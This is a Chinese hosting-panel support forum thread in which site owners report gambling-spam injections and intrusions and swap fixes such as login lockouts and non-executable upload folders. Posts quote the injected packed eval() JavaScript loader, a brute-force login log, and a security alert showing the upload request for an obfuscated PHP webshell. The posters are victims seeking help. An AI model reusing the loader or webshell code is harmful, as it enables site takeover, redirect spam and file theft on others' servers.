无标题文档
wdCP系统 (介绍,功能特性,运行环境,安装说明,演示,常见问题,使用教程) wdCDN系统 (介绍,功能特性,运行环境,安装说明,演示,常见问题,使用手册)
wdOS系统 (介绍,功能特性,运行环境,安装说明,演示,常见问题,使用教程) wdDNS系统 (介绍,功能特性,运行环境,安装说明,演示,常见问题,使用手册)
注册 发贴 提问 回复-必看必看 wddns免费智能 DNS 开通 本地或虚拟机使 用wdcp 一键包在mysql编 译时"卡住"
AI导航网AI应用网站大全 wdcp官方技术支持/服务 阿里云8折优惠券 无敌云 腾讯云优惠中,现注册更有260代金额券赠送
返回列表 发帖
提问三步曲: 提问先看教程/FAQ索引(wdcp,wdcp_v3,一键包)及搜索,会让你更快解决问题
1 提供详细,如系统版本,wdcp版本,软件版本等及错误的详细信息,贴上论坛或截图发论坛
2 做过哪些操作或改动设置等

温馨提示:信息不详,很可能会没人理你!论坛有教程说明的,也可能没人理!因为,你懂的

[求助] 最近网站一直被挂马, 会不会是WDCP环境出什么安全问题了?

最近网站一直被挂马,从百度搜进来的都会跳转到一个博彩网页,会不会是WDCP环境出什么安全问题了?
我在A服务器被挂后换到B服务器(隐藏好IP了的)还是被跟上挂马。服务器里只有一个Discuz! X3.4,其他都是静态页了。
被挂的代码大概是这样的
  1. <meta name="keywords" content="澳门威尼斯在线平台,威尼斯网上娱乐平台,威尼斯平台官网,威尼斯游戏平台,威尼斯 "/>
  2. <meta name="description" content="【wnsr484.com】威尼斯人官方网可以让国内的很多游戏玩家都开始喜好上这种娱乐游戏体验方式。这是人们拥有完美业余生活的有效途径。这对改善生活质量的作用非常的重要。"/>
  3. <script>if(navigator.userAgent.toLocaleLowerCase().indexOf("baidu") == -1){document.title ="XX"}</script>
  4. <script type="text/javascript">
  5. eval(function(p,a,c,k,e,d){e=function(c){return(c<a?"":e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1;};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p;}('o["\\e\\c\\1\\n\\f\\8\\m\\0"]["\\7\\3\\9\\0\\8"](\'\\g\\2\\1\\3\\9\\4\\0 \\0\\k\\4\\8\\d\\6\\0\\8\\l\\0\\5\\h\\a\\j\\a\\2\\1\\3\\9\\4\\0\\6 \\2\\3\\1\\d\\6\\s\\0\\0\\4\\2\\t\\5\\5\\7\\7\\7\\b\\u\\1\\e\\a\\2\\r\\b\\1\\c\\f\\5\\j\\q\\p\\b\\h\\2\\6\\i\\g\\5\\2\\1\\3\\9\\4\\0\\i\');',31,31,'x74|x63|x73|x72|x70|x2f|x22|x77|x65|x69|x61|x2e|x6f|x3d|x64|x6d|x3c|x6a|x3e|x76|x79|x78|x6e|x75|window|x31|x36|x38|x68|x3a|x62'.split('|'),0,{}))</script>
复制代码
我就是我

  1. 104         admin         qq1*****         119.166.54.71         2018-08-21 01:49:37         密码错误
  2. 103         admin         110*****         119.166.54.71         2018-08-21 01:49:37         密码错误
  3. 102         admin         112*****         119.166.54.71         2018-08-21 01:49:37         密码错误
  4. 101         admin         147*****         119.166.54.71         2018-08-21 01:49:37         密码错误
  5. 100         admin         753*****         119.166.54.71         2018-08-21 01:49:37         密码错误
  6. 99         admin         584*****         119.166.54.71         2018-08-21 01:49:37         密码错误
  7. 98         admin         asd*****         119.166.54.71         2018-08-21 01:49:37         密码错误
  8. 97         admin         1A2*****         119.166.54.71         2018-08-21 01:49:37         密码错误
  9. 96         admin         159*****         119.166.54.71         2018-08-21 01:49:37         密码错误
  10. 95         admin         wan*****         119.166.54.71         2018-08-21 01:49:36         密码错误
  11. 94         admin         zxc*****         119.166.54.71         2018-08-21 01:49:36         密码错误
  12. 93         admin         cao*****         119.166.54.71         2018-08-21 01:49:36         密码错误
  13. 92         admin         nih*****         119.166.54.71         2018-08-21 01:49:36         密码错误
  14. 91         admin         s12*****         119.166.54.71         2018-08-21 01:49:36         密码错误
  15. 90         admin         584*****         119.166.54.71         2018-08-21 01:49:36         密码错误
  16. 89         admin         12q*****         119.166.54.71         2018-08-21 01:49:36         密码错误
  17. 88         admin         111*****         119.166.54.71         2018-08-21 01:49:36         密码错误
  18. 87         admin         123*****         119.166.54.71         2018-08-21 01:49:36         密码错误
  19. 86         admin         a12*****         119.166.54.71         2018-08-21 01:49:36         密码错误

  20.     只显示最近30条记录
复制代码
现在一安装好模板就会有自动程序破解登录密码
你可以去系统设置 登录日志 看看有没有

TOP

我记得几个月前安装的没有这种情况。

TOP

建议去系统设置里面开启三次登录限制锁定半小时
OMEO.ML

TOP

我的也是,多站点都被挂马,怀疑服务器问题

TOP

和楼主一毛一样的问题,同求

TOP

本帖最后由 akme8 于 2018-10-26 09:42 编辑

我之前也遇到了这个问题,我最近修补了网站的补丁,改了后台地址,删掉一些不常用的管理员账号,在ftp上删掉那些不属于你的文件,还有改了ftp端口号,那些账号密码能改的都改掉,这一周来暂时都没有类似的情况出现,希望对你有帮助。

TOP

XXXX:8080/sys/filee?act=edit&t=f&p=/www/web/XXXXXX/public_html/upload/201612/1482310143.php

我也是经常被挂马
通过这个地址挂上来的。这个是wdcp的文件吧

TOP

登录了后台挂马?
有登录后台的权限,哪还需要挂,直接上传就可以,要多少有多少?

如果没登录,用这个地址,能挂上来?
看清提问三步曲及多看教程/FAQ索引(wdcp,v3,一键包,wdOS),益处多多.wdcp工具集 阿里云主机8折优惠码

TOP

回复 9# admin


肯定是没有登陆挂马。通过这个地址挂的,是阿里的 态势感知 提示的。并且是能够通过这个写入文件,以下是相关的信息。请尽快测试。谢谢!挂了好多马,并且跟楼主一样,在主页写入了博彩的相关信息,并进行了加密。javascript进行解密

疑似攻击者IP
222.247.108.16
入侵点URL

XXXXXX:8080/sys/filee?act=edit&t=f&p=/www/web/XXXXXXXX/public_html/upload/201612/1482310143.php
Http Payload

------WebKitFormBoundaryYlHudQYI8qGl61Qw
Content-Disposition: form-data; name="fn"

/www/web/XXXXXXX/public_html/upload/201612/1482310143.php
------WebKitFormBoundaryYlHudQYI8qGl61Qw
Content-Disposition: form-data; name="furl"

/sys/file?p=%2fwww%2fweb%2fwww_XXXXX_com%2fpublic_html%2fupload/201612&act=list&t=d
------WebKitFormBoundaryYlHudQYI8qGl61Qw
Content-Disposition: form-data; name="contents"

<?php error_reporting(0);$sr="st"./*+/*+*/"rr"/*+/*+*/."ev";$id=$sr/*+/*+*/("ri"."d_"."si");$rn=$sr/*+/*+*/("em"."an"."er");$dn=$sr/*+/*+*/("em"."anr"."id");$od=$sr/*+/*+*/("ri"."dne"."po");$rd=$sr/*+/*+*/("ri"."dda"."er");$cd=$sr/*+/*+*/("ri"."deso"."lc");$fpc=$sr/*+/*+*/("stn"."etn"."oc_t"."up_e"."lif");$fgc=$sr/*+/*+*/("stn"."etn"."oc_t"."eg_e"."lif");$muf=$sr/*+/*+*/("eli"."f_d"."eda"."olp"."u_e"."vom");$dlform='<form method="post">FN:<input name="fn" size="20" type="text">URL:<input name="url" size="50" type="text"><input type="submit" value="ok"></form>';$ulform='<form method="post" enc
Http user_agent

Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.92 Safari/537.36
被写入的可疑文件路径

/www/web/XXXXXXpublic_html/upload/201612/1482310143.php
事件说明

云盾检测到有疑似黑客在通过WEB漏洞或者WEBSHELL向服务器写入WEBSHELL文件或可疑的二进制文件,请及时关注。
解决方案

请及时排查告警中的URL对应的磁盘文件是否存在漏洞,或者是否是WEBSHELL,并及时修复WEB漏洞及删除已存在的WEBSHELL文件。如果该URL接口是您网站正常的文件上传接口,请在控制台点击标记为误报或忽略按钮。

TOP

目前我做了一个服务器策略,临时解决。所有目录不允许写入,upload目录允许写入但是不允许执行

TOP

没登录的话,这个是不可能写得了文件的
你可以复制地址或路径试试看
看清提问三步曲及多看教程/FAQ索引(wdcp,v3,一键包,wdOS),益处多多.wdcp工具集 阿里云主机8折优惠码

TOP

回复 12# admin

你好,管理员,这是阿里态势给出的提示,肯定是没有登陆的。密码我修改过,直接写入的文件。

TOP

linux系统也没有新增用户,系统漏洞也清理了。

TOP

回复 13# steven001

密码我修改过,直接写入的文件。
这个是什么意思?


阿里态势,这个也不一定准确吧?要看这个是否成功访问的状态
阿里给的警报,有时不太可信,在V2版本里,阿里把wdcp里的一个文件,只要这个文件存在,就危险,哪怕这个文件是空文件
看清提问三步曲及多看教程/FAQ索引(wdcp,v3,一键包,wdOS),益处多多.wdcp工具集 阿里云主机8折优惠码

TOP

返回列表